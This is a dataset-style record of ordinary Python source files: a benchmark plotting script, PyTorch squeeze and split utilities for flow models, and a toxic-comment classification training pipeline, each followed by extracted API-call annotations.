code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
#/usr/bin/env python
# Script to read the result of the benchmark program and plot the results.
# Options:
# `-i arg` : input file (benchmark result)
# `-o arg` : html output for the plot
# Notes: After the script runs the plot will automatically be shown in a browser.
# Tested with python 3 only.
import argparse
import itertools
import collections
import pandas as pd
import matplotlib.pyplot as plt
import re
from bokeh.layouts import gridplot
from bokeh.palettes import Spectral11
from bokeh.plotting import figure, show, output_file
# Given a file at the start of a test result (on the header line)
# Return a data frame for the test result and leave the file one past
# the blank line at the end of the result
def to_data_frame(header, it):
column_labels = re.split(' +', header.strip())
columns = [[] for i in range(len(column_labels))]
for l in it:
l = l.strip()
if not l:
break
fields = l.split()
if len(fields) != len(columns):
raise Exception('Bad file format, line: {}'.format(l))
for c, f in zip(columns, fields):
c.append(float(f))
d = {k: v for k, v in zip(column_labels, columns)}
return pd.DataFrame(d, columns=column_labels[1:], index=columns[0])
def to_data_frames(f):
trial = ''
result = {}
for l in f:
if l and l[0] == '#': continue
if l and l[0] == ' ' and l.strip():
if trial:
# Remove anything in parens
trial = re.sub('\([^\)]*\)', '', trial)
result[trial] = to_data_frame(l, f)
trial = ''
continue
if trial: trial += ' ' # Handle multi-line labels
trial += l.strip()
return result
def bokeh_plot(title, df):
numlines = len(df.columns)
palette = Spectral11[0:numlines]
p = figure(
width=500,
height=400,
title=title,
x_axis_label='DB Items',
y_axis_label='Ops/Sec.')
for col_idx in range(numlines):
p.line(
x=df.index.values,
y=df.iloc[:, col_idx],
legend=df.columns[col_idx],
line_color=palette[col_idx],
line_width=5)
return p
def run_main(result_filename, plot_output):
with open(result_filename) as f:
dfd = to_data_frames(f)
plots = []
for k, v in dfd.items():
plots.append(bokeh_plot(k, v))
output_file(plot_output, title="NuDB Benchmark")
show(gridplot(*plots, ncols=2, plot_width=500, plot_height=400))
return dfd # for testing
def parse_args():
parser = argparse.ArgumentParser(
description=('Plot the benchmark results'))
parser.add_argument(
'--input',
'-i',
help=('input'), )
parser.add_argument(
'--output',
'-o',
help=('output'), )
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
result_filename = args.input
plot_output = args.output
if not result_filename:
print('No result file specified. Exiting')
elif not plot_output:
print('No output file specified. Exiting')
else:
run_main(result_filename, plot_output)
| [
"bokeh.plotting.figure",
"argparse.ArgumentParser",
"bokeh.layouts.gridplot",
"pandas.DataFrame",
"re.sub",
"bokeh.plotting.output_file"
] | [((1218, 1278), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {'columns': 'column_labels[1:]', 'index': 'columns[0]'}), '(d, columns=column_labels[1:], index=columns[0])\n', (1230, 1278), True, 'import pandas as pd\n'), ((1861, 1957), 'bokeh.plotting.figure', 'figure', ([], {'width': '(500)', 'height': '(400)', 'title': 'title', 'x_axis_label': '"""DB Items"""', 'y_axis_label': '"""Ops/Sec."""'}), "(width=500, height=400, title=title, x_axis_label='DB Items',\n y_axis_label='Ops/Sec.')\n", (1867, 1957), False, 'from bokeh.plotting import figure, show, output_file\n'), ((2640, 2705), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Plot the benchmark results"""'}), "(description='Plot the benchmark results')\n", (2663, 2705), False, 'import argparse\n'), ((2451, 2499), 'bokeh.plotting.output_file', 'output_file', (['plot_output'], {'title': '"""NuDB Benchmark"""'}), "(plot_output, title='NuDB Benchmark')\n", (2462, 2499), False, 'from bokeh.plotting import figure, show, output_file\n'), ((2513, 2571), 'bokeh.layouts.gridplot', 'gridplot', (['*plots'], {'ncols': '(2)', 'plot_width': '(500)', 'plot_height': '(400)'}), '(*plots, ncols=2, plot_width=500, plot_height=400)\n', (2521, 2571), False, 'from bokeh.layouts import gridplot\n'), ((1524, 1558), 're.sub', 're.sub', (['"""\\\\([^\\\\)]*\\\\)"""', '""""""', 'trial'], {}), "('\\\\([^\\\\)]*\\\\)', '', trial)\n", (1530, 1558), False, 'import re\n')] |
import torch
import torch.nn as nn
def channel_split(z, dim=1, odd=False):
C = z.size(dim)
z0, z1 = torch.split(z, C // 2, dim=dim)
if odd:
z0, z1 = z1, z0
return z0, z1
def channel_merge(z0, z1, dim=1, odd=False):
if odd:
z0, z1 = z1, z0
z = torch.cat([z0, z1], dim=dim)
return z
def get_checker_mask(H, W, odd=False, device=None):
ix = torch.arange(W).to(device).long()
iy = torch.arange(H).to(device).long()
iy, ix = torch.meshgrid([iy, ix])
mod = 0 if odd else 1
mask = ((ix + iy) % 2 == mod).float()
mask = mask.view(1, 1, H, W)
return mask
def checker_split(z, odd=False):
assert z.dim() == 4
B, C, H, W = z.size()
z = z.view(B, C, H // 2, 2, W // 2, 2) # (B, C, sH, 2, sW, 2)
z = z.permute(0, 1, 3, 5, 2, 4).contiguous() # (B, C, 2, 2, sH, sW)
z = z.view(B, C * 4, H // 2, W // 2) # (B, C * 4, sH, sW)
za, zb, zc, zd = torch.split(z, C, dim=1)
z0 = torch.cat([za, zd], dim=1)
z1 = torch.cat([zb, zc], dim=1)
if odd:
z0, z1 = z1, z0
return z0, z1
def checker_merge(z0, z1, odd=False):
assert z0.dim() == 4 and z1.dim() == 4
B, C2, sH, sW = z0.size()
C = C2 // 2
if odd:
z0, z1 = z1, z0
za, zd = torch.split(z0, C, dim=1)
zb, zc = torch.split(z1, C, dim=1)
z = torch.cat([za, zb, zc, zd], dim=1)
z = z.view(B, C, 2, 2, sH, sW).permute(0, 1, 4, 2, 5, 3).contiguous()
z = z.view(B, C, sH * 2, sW * 2)
return z
def squeeze1d(z, odd=False):
assert z.dim() == 2
B, C = z.size()
z = z.view(B, C // 2, 2)
z0 = z[:, :, 0]
z1 = z[:, :, 1]
if odd:
z0, z1 = z1, z0
return z0, z1
def unsqueeze1d(z0, z1, odd=False):
assert z0.dim() == 2 and z1.dim() == 2
B, hC = z0.size()
if odd:
z0, z1 = z1, z0
z = torch.stack([z0, z1], dim=-1)
z = z.view(B, -1).contiguous()
return z
def squeeze2d(z, odd=False):
assert z.dim() == 4
B, C, H, W = z.size()
z = z.view(B, C, H // 2, 2, W // 2, 2) # (B, C, sH, 2, sW, 2)
z = z.permute(0, 1, 3, 5, 2, 4).contiguous() # (B, C, 2, 2, sH, sW)
z = z.view(B, C * 4, H // 2, W // 2) # (B, C * 4, sH, sW)
z0, z1 = torch.split(z, C * 2, dim=1)
if odd:
z0, z1 = z1, z0
return z0, z1
def unsqueeze2d(z0, z1, odd=False):
assert z0.dim() == 4 and z1.dim() == 4
B, C2, sH, sW = z0.size()
C = C2 // 2
if odd:
z0, z1 = z1, z0
z = torch.cat([z0, z1], dim=1)
z = z.view(B, C, 2, 2, sH, sW).permute(0, 1, 4, 2, 5, 3).contiguous()
z = z.view(B, C, sH * 2, sW * 2)
return z
class Squeeze1d(nn.Module):
"""
split 1D vector into two half-size vectors
by extracting entries alternatingly
"""
def __init__(self, odd=False):
super(Squeeze1d, self).__init__()
self.odd = odd
def forward(self, z, log_df_dz):
z0, z1 = squeeze1d(z, self.odd)
z = torch.cat([z0, z1], dim=1)
return z, log_df_dz
def backward(self, z, log_df_dz):
z0, z1 = torch.split(z, z.size(1) // 2, dim=1)
z = unsqueeze1d(z0, z1, self.odd)
return z, log_df_dz
class Unsqueeze1d(nn.Module):
"""
merge 1D vectors given by Squeeze1d
"""
def __init__(self, odd=False):
super(Unsqueeze1d, self).__init__()
self.odd = odd
def forward(self, z, log_df_dz):
z0, z1 = torch.split(z, z.size(1) // 2, dim=1)
z = unsqueeze1d(z0, z1, self.odd)
return z, log_df_dz
def backward(self, z, log_df_dz):
z0, z1 = squeeze1d(z, self.odd)
z = torch.cat([z0, z1], dim=1)
return z, log_df_dz
class Squeeze2d(nn.Module):
"""
split an 2D feature map into two maps by
extracting pixels using checkerboard pattern
"""
def __init__(self, odd=False):
super(Squeeze2d, self).__init__()
self.odd = odd
def forward(self, z, log_df_dz):
z0, z1 = squeeze2d(z, self.odd)
z = torch.cat([z0, z1], dim=1)
return z, log_df_dz
def backward(self, z, log_df_dz):
z0, z1 = torch.split(z, z.size(1) // 2, dim=1)
z = unsqueeze2d(z0, z1, self.odd)
return z, log_df_dz
class Unsqueeze2d(nn.Module):
"""
Merge two 2D feature maps given by Squeeze2d
"""
def __init__(self, odd=False):
super(Unsqueeze2d, self).__init__()
self.odd = odd
def forward(self, z, log_df_dz):
z0, z1 = torch.split(z, z.size(1) // 2, dim=1)
z = unsqueeze2d(z0, z1, self.odd)
return z, log_df_dz
def backward(self, z, log_df_dz):
z0, z1 = squeeze2d(z, self.odd)
z = torch.cat([z0, z1], dim=1)
return z, log_df_dz
| [
"torch.split",
"torch.stack",
"torch.cat",
"torch.meshgrid",
"torch.arange"
] | [((110, 141), 'torch.split', 'torch.split', (['z', '(C // 2)'], {'dim': 'dim'}), '(z, C // 2, dim=dim)\n', (121, 141), False, 'import torch\n'), ((287, 315), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': 'dim'}), '([z0, z1], dim=dim)\n', (296, 315), False, 'import torch\n'), ((482, 506), 'torch.meshgrid', 'torch.meshgrid', (['[iy, ix]'], {}), '([iy, ix])\n', (496, 506), False, 'import torch\n'), ((936, 960), 'torch.split', 'torch.split', (['z', 'C'], {'dim': '(1)'}), '(z, C, dim=1)\n', (947, 960), False, 'import torch\n'), ((970, 996), 'torch.cat', 'torch.cat', (['[za, zd]'], {'dim': '(1)'}), '([za, zd], dim=1)\n', (979, 996), False, 'import torch\n'), ((1006, 1032), 'torch.cat', 'torch.cat', (['[zb, zc]'], {'dim': '(1)'}), '([zb, zc], dim=1)\n', (1015, 1032), False, 'import torch\n'), ((1267, 1292), 'torch.split', 'torch.split', (['z0', 'C'], {'dim': '(1)'}), '(z0, C, dim=1)\n', (1278, 1292), False, 'import torch\n'), ((1306, 1331), 'torch.split', 'torch.split', (['z1', 'C'], {'dim': '(1)'}), '(z1, C, dim=1)\n', (1317, 1331), False, 'import torch\n'), ((1340, 1374), 'torch.cat', 'torch.cat', (['[za, zb, zc, zd]'], {'dim': '(1)'}), '([za, zb, zc, zd], dim=1)\n', (1349, 1374), False, 'import torch\n'), ((1846, 1875), 'torch.stack', 'torch.stack', (['[z0, z1]'], {'dim': '(-1)'}), '([z0, z1], dim=-1)\n', (1857, 1875), False, 'import torch\n'), ((2222, 2250), 'torch.split', 'torch.split', (['z', '(C * 2)'], {'dim': '(1)'}), '(z, C * 2, dim=1)\n', (2233, 2250), False, 'import torch\n'), ((2478, 2504), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (2487, 2504), False, 'import torch\n'), ((2953, 2979), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (2962, 2979), False, 'import torch\n'), ((3616, 3642), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (3625, 3642), False, 'import torch\n'), ((4001, 4027), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (4010, 4027), False, 'import torch\n'), ((4673, 4699), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (4682, 4699), False, 'import torch\n'), ((392, 407), 'torch.arange', 'torch.arange', (['W'], {}), '(W)\n', (404, 407), False, 'import torch\n'), ((435, 450), 'torch.arange', 'torch.arange', (['H'], {}), '(H)\n', (447, 450), False, 'import torch\n')] |
from __future__ import absolute_import
import os.path
import argparse
import logging
import json
from six import iteritems
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.externals import joblib
from keras.models import load_model
from tensorflow.python.client import device_lib
from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity
from features import catboost_features
from preprocessing import clean_text, convert_text2seq, split_data, parse_seq
from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions
from train import train
from metrics import get_metrics, print_metrics
def get_kwargs(kwargs):
parser = argparse.ArgumentParser(description='-f TRAIN_FILE -t TEST_FILE -o OUTPUT_FILE -e EMBEDS_FILE [-l LOGGER_FILE] [--swear-words SWEAR_FILE] [--wrong-words WRONG_WORDS_FILE] [--format-embeds FALSE]')
parser.add_argument('-f', '--train', dest='train', action='store', help='/path/to/trian_file', type=str)
parser.add_argument('-t', '--test', dest='test', action='store', help='/path/to/test_file', type=str)
parser.add_argument('-o', '--output', dest='output', action='store', help='/path/to/output_file', type=str)
parser.add_argument('-we', '--word_embeds', dest='word_embeds', action='store', help='/path/to/embeds_file', type=str)
parser.add_argument('-ce', '--char_embeds', dest='char_embeds', action='store', help='/path/to/embeds_file', type=str)
parser.add_argument('-c','--config', dest='config', action='store', help='/path/to/config.json', type=str)
parser.add_argument('-l', '--logger', dest='logger', action='store', help='/path/to/log_file', type=str, default=None)
parser.add_argument('--mode', dest='mode', action='store', help='preprocess / train / validate / all', type=str, default='all')
parser.add_argument('--max-words', dest='max_words', action='store', type=int, default=300000)
parser.add_argument('--use-only-exists-words', dest='use_only_exists_words', action='store_true')
parser.add_argument('--swear-words', dest='swear_words', action='store', help='/path/to/swear_words_file', type=str, default=None)
parser.add_argument('--wrong-words', dest='wrong_words', action='store', help='/path/to/wrong_words_file', type=str, default=None)
parser.add_argument('--format-embeds', dest='format_embeds', action='store', help='file | json | pickle | binary', type=str, default='raw')
parser.add_argument('--output-dir', dest='output_dir', action='store', help='/path/to/dir', type=str, default='.')
parser.add_argument('--norm-prob', dest='norm_prob', action='store_true')
parser.add_argument('--norm-prob-koef', dest='norm_prob_koef', action='store', type=float, default=1)
parser.add_argument('--gpus', dest='gpus', action='store', help='count GPUs', type=int, default=0)
for key, value in iteritems(parser.parse_args().__dict__):
kwargs[key] = value
def main(*kargs, **kwargs):
get_kwargs(kwargs)
train_fname = kwargs['train']
test_fname = kwargs['test']
result_fname = kwargs['output']
word_embeds_fname = kwargs['word_embeds']
char_embeds_fname = kwargs['char_embeds']
logger_fname = kwargs['logger']
mode = kwargs['mode']
max_words = kwargs['max_words']
use_only_exists_words = kwargs['use_only_exists_words']
swear_words_fname = kwargs['swear_words']
wrong_words_fname = kwargs['wrong_words']
embeds_format = kwargs['format_embeds']
config = kwargs['config']
output_dir = kwargs['output_dir']
norm_prob = kwargs['norm_prob']
norm_prob_koef = kwargs['norm_prob_koef']
gpus = kwargs['gpus']
seq_col_name_words = 'comment_seq_lw_use_exist{}_{}k'.format(int(use_only_exists_words), int(max_words/1000))
seq_col_name_ll3 = 'comment_seq_ll3_use_exist{}_{}k'.format(int(use_only_exists_words), int(max_words/1000))
model_file = {
'dense': os.path.join(output_dir, 'dense.h5'),
'cnn': os.path.join(output_dir, 'cnn.h5'),
'lstm': os.path.join(output_dir, 'lstm.h5'),
'lr': os.path.join(output_dir, '{}_logreg.bin'),
'catboost': os.path.join(output_dir, '{}_catboost.bin')
}
# ====Create logger====
logger = Logger(logging.getLogger(), logger_fname)
# ====Detect GPUs====
logger.debug(device_lib.list_local_devices())
# ====Load data====
logger.info('Loading data...')
train_df = load_data(train_fname)
test_df = load_data(test_fname)
target_labels = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
num_classes = len(target_labels)
# ====Load additional data====
logger.info('Loading additional data...')
swear_words = load_data(swear_words_fname, func=lambda x: set(x.T[0]), header=None)
wrong_words_dict = load_data(wrong_words_fname, func=lambda x: {val[0] : val[1] for val in x})
# ====Load word vectors====
logger.info('Loading embeddings...')
embeds_word = Embeds().load(word_embeds_fname, embeds_format)
embeds_ll3 = Embeds().load(char_embeds_fname, embeds_format)
# ====Clean texts====
if mode in ('preprocess', 'all'):
logger.info('Cleaning text...')
train_df['comment_text_clear'] = clean_text(train_df['comment_text'], wrong_words_dict, autocorrect=True)
test_df['comment_text_clear'] = clean_text(test_df['comment_text'], wrong_words_dict, autocorrect=True)
train_df.to_csv(os.path.join(output_dir, 'train_clear.csv'), index=False)
test_df.to_csv(os.path.join(output_dir, 'test_clear.csv'), index=False)
# ====Calculate maximum seq length====
logger.info('Calc text length...')
train_df.fillna('__NA__', inplace=True)
test_df.fillna('__NA__', inplace=True)
train_df['text_len'] = train_df['comment_text_clear'].apply(lambda words: len(words.split()))
test_df['text_len'] = test_df['comment_text_clear'].apply(lambda words: len(words.split()))
max_seq_len = np.round(train_df['text_len'].mean() + 3*train_df['text_len'].std()).astype(int)
max_char_seq_len = 2000 # empirical
logger.debug('Max seq length = {}'.format(max_seq_len))
# ====Prepare data to NN====
logger.info('Converting texts to sequences...')
if mode in ('preprocess', 'all'):
train_df[seq_col_name_words], test_df[seq_col_name_words], word_index, train_df[seq_col_name_ll3], test_df[seq_col_name_ll3], ll3_index = convert_text2seq(
train_df['comment_text_clear'].tolist(),
test_df['comment_text_clear'].tolist(),
max_words,
max_seq_len,
max_char_seq_len,
embeds_word,
lower=True,
oov_token='__<PASSWORD>',
uniq=False,
use_only_exists_words=use_only_exists_words)
logger.debug('Dictionary size use_exist{} = {}'.format(int(use_only_exists_words), len(word_index)))
logger.debug('Char dict size use_exist{} = {}'.format(int(use_only_exists_words), len(ll3_index)))
logger.info('Preparing embedding matrix...')
words_not_found = embeds_word.set_matrix(max_words, word_index)
embeds_ll3.matrix = np.random.normal(size=(len(ll3_index), embeds_word.shape[1]))
embeds_ll3.word_index = ll3_index
embeds_ll3.word_index_reverse = {val: key for key, val in ll3_index.items()}
embeds_ll3.shape = np.shape(embeds_ll3.matrix)
embeds_word.save(os.path.join(output_dir, 'wiki.embeds_lw.{}k'.format(int(max_words/1000))))
embeds_ll3.save(os.path.join(output_dir, 'wiki.embeds_ll3.{}k'.format(int(max_words/1000))))
# ====Get text vector====
pooling = {
'max': {'func': np.max},
'avg': {'func': np.sum, 'normalize': True},
'sum': {'func': np.sum, 'normalize': False}
}
for p in ['max', 'avg', 'sum']:
train_df['comment_vec_{}'.format(p)] = train_df[seq_col_name_words].apply(lambda x: embed_aggregate(x, embeds_word, **pooling[p]))
test_df['comment_vec_{}'.format(p)] = test_df[seq_col_name_words].apply(lambda x: embed_aggregate(x, embeds_word, **pooling[p]))
train_df.to_csv(os.path.join(output_dir, 'train_clear1.csv'), index=False)
test_df.to_csv(os.path.join(output_dir, 'test_clear1.csv'), index=False)
else:
for col in train_df.columns:
if col.startswith('comment_seq'):
train_df[col] = train_df[col].apply(lambda x: parse_seq(x, int))
test_df[col] = test_df[col].apply(lambda x: parse_seq(x, int))
elif col.startswith('comment_vec'):
train_df[col] = train_df[col].apply(lambda x: parse_seq(x, float))
test_df[col] = test_df[col].apply(lambda x: parse_seq(x, float))
logger.debug('Embedding matrix shape = {}'.format(embeds_word.shape))
logger.debug('Number of null word embeddings = {}'.format(np.sum(np.sum(embeds_word.matrix, axis=1) == 0)))
# ====END OF `PREPROCESS`====
if mode == 'preprocess':
return True
# ====Train/test split data====
x = np.array(train_df[seq_col_name_words].values.tolist())
y = np.array(train_df[target_labels].values.tolist())
x_train_nn, x_val_nn, y_train, y_val, train_idxs, val_idxs = split_data(x, y, test_size=0.2, shuffle=True, random_state=42)
x_test_nn = np.array(test_df[seq_col_name_words].values.tolist())
x_char = np.array(train_df[seq_col_name_ll3].values.tolist())
x_char_train_nn = x_char[train_idxs]
x_char_val_nn = x_char[val_idxs]
x_char_test_nn = np.array(test_df[seq_col_name_ll3].values.tolist())
x_train_tfidf = train_df['comment_text_clear'].values[train_idxs]
x_val_tfidf = train_df['comment_text_clear'].values[val_idxs]
x_test_tfidf = test_df['comment_text_clear'].values
catboost_cols = catboost_features(train_df, test_df)
x_train_cb = train_df[catboost_cols].values[train_idxs].T
x_val_cb = train_df[catboost_cols].values[val_idxs].T
x_test_cb = test_df[catboost_cols].values.T
# ====Train models====
nn_models = {
'cnn': cnn,
'dense': dense,
'rnn': rnn
}
params = Params(config)
metrics = {}
predictions = {}
for param in params['models']:
for model_label, model_params in param.items():
if model_params.get('common', {}).get('warm_start', False) and os.path.exists(model_params.get('common', {}).get('model_file', '')):
logger.info('{} warm starting...'.format(model_label))
model = load_model(model_params.get('common', {}).get('model_file', None))
elif model_label in nn_models:
model = nn_models[model_label](
embeds_word.matrix,
embeds_ll3.matrix,
num_classes,
max_seq_len,
max_char_seq_len,
gpus=gpus,
**model_params['init'])
model_alias = model_params.get('common', {}).get('alias', None)
if model_alias is None or not model_alias:
model_alias = '{}_{}'.format(model_label, i)
logger.info("training {} ...".format(model_label))
if model_label == 'dense':
x_tr = [x_train_nn, x_char_train_nn]
x_val = [x_val_nn, x_char_val_nn]
x_test = [x_test_nn, x_char_test_nn]
else:
x_tr = x_train_nn
x_val = x_val_nn
x_test = x_test_nn
hist = train(x_tr,
y_train,
model,
logger=logger,
**model_params['train'])
predictions[model_alias] = model.predict(x_val)
save_predictions(test_df, model.predict(x_test), target_labels, model_alias)
elif model_label == 'tfidf':
model = TFIDF(target_labels, **model_params['init'])
model.fit(x_train_tfidf, y_train, **model_params['train'])
predictions[model_alias] = model.predict(x_val_tfidf)
save_predictions(test_df, model.predict(x_test_tfidf), target_labels, model_alias)
elif model_label == 'catboost':
model = CatBoost(target_labels, **model_params['init'])
model.fit(x_train_cb, y_train, eval_set=(x_val_cb, y_val), use_best_model=True)
predictions[model_alias] = model.predict_proba(x_val_cb)
save_predictions(test_df, model.predict_proba(x_test_cb), target_labels, model_alias)
metrics[model_alias] = get_metrics(y_val, predictions[model_alias], target_labels)
logger.debug('{} params:\n{}'.format(model_alias, model_params))
logger.debug('{} metrics:\n{}'.format(model_alias, print_metrics(metrics[model_alias])))
model.save(os.path.join(output_dir, model_params['common']['model_file']))
logger.info('Saving metrics...')
with open(os.path.join(output_dir, 'metrics.json'), 'w') as f:
f.write(json.dumps(metrics))
# ====END OF `VALIDATE`====
if mode == 'validate':
return True
# Meta catboost
logger.info('training catboost as metamodel...')
x_meta = [predictions[model_alias] for model_alias in sorted(predictions.keys())]
x_meta = np.array(x_train_meta).T
x_train_meta, x_val_meta, y_train_meta, y_val_meta = train_test_split(x_meta, y_val, test_size=0.20, random_state=42)
meta_model = CatBoost(target_labels,
loss_function='Logloss',
iterations=1000,
depth=6,
learning_rate=0.03,
rsm=1
)
meta_model.fit(x_train_meta, y_train_meta, eval_set=(x_val_meta, y_val_meta), use_best_model=True)
y_hat_meta = meta_model.predict_proba(x_val_meta)
metrics_meta = get_metrics(y_val_meta, y_hat_meta, target_labels)
#model.save(os.path.join(output_dir, 'meta.catboost')
logger.debug('{} metrics:\n{}'.format('META', print_metrics(metrics_meta)))
# ====Predict====
logger.info('Applying models...')
test_cols = []
for model_alias in sorted(predictions.keys()):
for label in target_labels:
test_cols.append('{}_{}'.format(model_alias, label))
x_test = test_df[test_cols].values
preds = meta_model.predict_proba(x_test)
for i, label in enumerate(target_labels):
test_df[label] = preds[:, i]
# ====Normalize probabilities====
if norm_prob:
for label in target_labels:
test_df[label] = norm_prob_koef * test_df[label]
# ====Save results====
logger.info('Saving results...')
test_df[['id', 'toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']].to_csv(result_fname, index=False, header=True)
test_df.to_csv('{}_tmp'.format(result_fname), index=False, header=True)
if __name__=='__main__':
main()
| [
"preprocessing.split_data",
"logging.getLogger",
"tensorflow.python.client.device_lib.list_local_devices",
"utils.load_data",
"numpy.array",
"models.CatBoost",
"preprocessing.clean_text",
"argparse.ArgumentParser",
"json.dumps",
"metrics.get_metrics",
"features.catboost_features",
"utils.embed... | [((697, 903), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""-f TRAIN_FILE -t TEST_FILE -o OUTPUT_FILE -e EMBEDS_FILE [-l LOGGER_FILE] [--swear-words SWEAR_FILE] [--wrong-words WRONG_WORDS_FILE] [--format-embeds FALSE]"""'}), "(description=\n '-f TRAIN_FILE -t TEST_FILE -o OUTPUT_FILE -e EMBEDS_FILE [-l LOGGER_FILE] [--swear-words SWEAR_FILE] [--wrong-words WRONG_WORDS_FILE] [--format-embeds FALSE]'\n )\n", (720, 903), False, 'import argparse\n'), ((4432, 4454), 'utils.load_data', 'load_data', (['train_fname'], {}), '(train_fname)\n', (4441, 4454), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((4469, 4490), 'utils.load_data', 'load_data', (['test_fname'], {}), '(test_fname)\n', (4478, 4490), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((4817, 4891), 'utils.load_data', 'load_data', (['wrong_words_fname'], {'func': '(lambda x: {val[0]: val[1] for val in x})'}), '(wrong_words_fname, func=lambda x: {val[0]: val[1] for val in x})\n', (4826, 4891), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((9974, 10036), 'preprocessing.split_data', 'split_data', (['x', 'y'], {'test_size': '(0.2)', 'shuffle': '(True)', 'random_state': '(42)'}), '(x, y, test_size=0.2, shuffle=True, random_state=42)\n', (9984, 10036), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((10539, 10575), 'features.catboost_features', 'catboost_features', (['train_df', 'test_df'], {}), '(train_df, test_df)\n', (10556, 10575), False, 'from features import catboost_features\n'), ((10873, 10887), 'utils.Params', 'Params', (['config'], {}), '(config)\n', (10879, 10887), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((14293, 14356), 'sklearn.model_selection.train_test_split', 'train_test_split', (['x_meta', 'y_val'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(x_meta, y_val, test_size=0.2, random_state=42)\n', (14309, 14356), False, 'from sklearn.model_selection import train_test_split\n'), ((14375, 14480), 'models.CatBoost', 'CatBoost', (['target_labels'], {'loss_function': '"""Logloss"""', 'iterations': '(1000)', 'depth': '(6)', 'learning_rate': '(0.03)', 'rsm': '(1)'}), "(target_labels, loss_function='Logloss', iterations=1000, depth=6,\n learning_rate=0.03, rsm=1)\n", (14383, 14480), False, 'from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions\n'), ((14783, 14833), 'metrics.get_metrics', 'get_metrics', (['y_val_meta', 'y_hat_meta', 'target_labels'], {}), '(y_val_meta, y_hat_meta, target_labels)\n', (14794, 14833), False, 'from metrics import get_metrics, print_metrics\n'), ((4245, 4264), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (4262, 4264), False, 'import logging\n'), ((4324, 4355), 'tensorflow.python.client.device_lib.list_local_devices', 'device_lib.list_local_devices', ([], {}), '()\n', (4353, 4355), False, 'from tensorflow.python.client import device_lib\n'), ((5244, 5316), 'preprocessing.clean_text', 'clean_text', (["train_df['comment_text']", 'wrong_words_dict'], {'autocorrect': '(True)'}), "(train_df['comment_text'], wrong_words_dict, autocorrect=True)\n", (5254, 5316), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((5357, 5428), 'preprocessing.clean_text', 'clean_text', (["test_df['comment_text']", 'wrong_words_dict'], {'autocorrect': '(True)'}), "(test_df['comment_text'], wrong_words_dict, autocorrect=True)\n", (5367, 5428), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((8070, 8097), 'numpy.shape', 'np.shape', (['embeds_ll3.matrix'], {}), '(embeds_ll3.matrix)\n', (8078, 8097), True, 'import numpy as np\n'), ((14210, 14232), 'numpy.array', 'np.array', (['x_train_meta'], {}), '(x_train_meta)\n', (14218, 14232), True, 'import numpy as np\n'), ((4985, 4993), 'utils.Embeds', 'Embeds', ([], {}), '()\n', (4991, 4993), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((5050, 5058), 'utils.Embeds', 'Embeds', ([], {}), '()\n', (5056, 5058), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((13488, 13547), 'metrics.get_metrics', 'get_metrics', (['y_val', 'predictions[model_alias]', 'target_labels'], {}), '(y_val, predictions[model_alias], target_labels)\n', (13499, 13547), False, 'from metrics import get_metrics, print_metrics\n'), ((13934, 13953), 'json.dumps', 'json.dumps', (['metrics'], {}), '(metrics)\n', (13944, 13953), False, 'import json\n'), ((14942, 14969), 'metrics.print_metrics', 'print_metrics', (['metrics_meta'], {}), '(metrics_meta)\n', (14955, 14969), False, 'from metrics import get_metrics, print_metrics\n'), ((8662, 8707), 'utils.embed_aggregate', 'embed_aggregate', (['x', 'embeds_word'], {}), '(x, embeds_word, **pooling[p])\n', (8677, 8707), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((8803, 8848), 'utils.embed_aggregate', 'embed_aggregate', (['x', 'embeds_word'], {}), '(x, embeds_word, **pooling[p])\n', (8818, 8848), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((9624, 9658), 'numpy.sum', 'np.sum', (['embeds_word.matrix'], {'axis': '(1)'}), '(embeds_word.matrix, axis=1)\n', (9630, 9658), True, 'import numpy as np\n'), ((12371, 12438), 'train.train', 'train', (['x_tr', 'y_train', 'model'], {'logger': 'logger'}), "(x_tr, y_train, model, logger=logger, **model_params['train'])\n", (12376, 12438), False, 'from train import train\n'), ((13688, 13723), 'metrics.print_metrics', 'print_metrics', (['metrics[model_alias]'], {}), '(metrics[model_alias])\n', (13701, 13723), False, 'from metrics import get_metrics, print_metrics\n'), ((9169, 9186), 'preprocessing.parse_seq', 'parse_seq', (['x', 'int'], {}), '(x, int)\n', (9178, 9186), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((9248, 9265), 'preprocessing.parse_seq', 'parse_seq', (['x', 'int'], {}), '(x, int)\n', (9257, 9265), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((12777, 12821), 'models.TFIDF', 'TFIDF', (['target_labels'], {}), 